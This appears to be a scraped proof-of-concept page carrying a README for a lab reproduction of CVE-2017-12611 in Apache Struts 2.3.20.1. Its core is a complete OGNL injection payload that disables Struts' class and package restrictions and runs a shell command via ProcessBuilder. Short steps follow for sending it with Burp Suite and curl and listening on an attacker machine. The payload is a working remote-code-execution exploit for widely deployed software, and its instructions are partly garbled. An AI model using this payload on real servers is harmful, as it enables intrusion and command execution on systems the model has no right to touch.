来源

关联漏洞

描述

RCE project

介绍

# CVE-2017-12611 Project

## Overview:

A RCE attack is possible with the given payload. 

## Environment & Tools

The following lists the environments and tools for testing and validation in an isolated, personal lab.

- **Host OS**: Ubuntu 18.04.6 
- **Attacker OS**: Kali Linux 
- **Container Platform**: Docker
- **Target Application Stack**: Apache Struts 2.3.20.1
- **Additional Components**: Burp Suite

## Environment Setup:

By using following command:
```bash
docker compose up -d 
```
You can run the environment. After that you can see a submission page by visiting [http://<YOUR_IP>:8080/hello.action](http://<YOUR_IP>:8080/hello.action).

## Payload:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

In order to execute an RCE attack it is necessary to use Burp Suite. While using Burp Suite, submit the payload. After submitting the payload find the correct log(POST) and convert it to a curl command. Finally, open your attacker machine and listen on the port after sending your curl command from the listenner port.  

### Notes:

Censored areas are IP addresses.

文件快照

 [4.0K]  /data/pocs/b9b8f843be4d1067c4ca263d19c518e7f50c09f5
├── [105K]  BurpSuite.png
├── [103K]  Payload.png
├── [369K]  RCE_id.png
├── [ 79K]  RCEuname-a.png
├── [149K]  RCE_whoami.png
└── [1.7K]  README.md

0 directories, 6 files

备注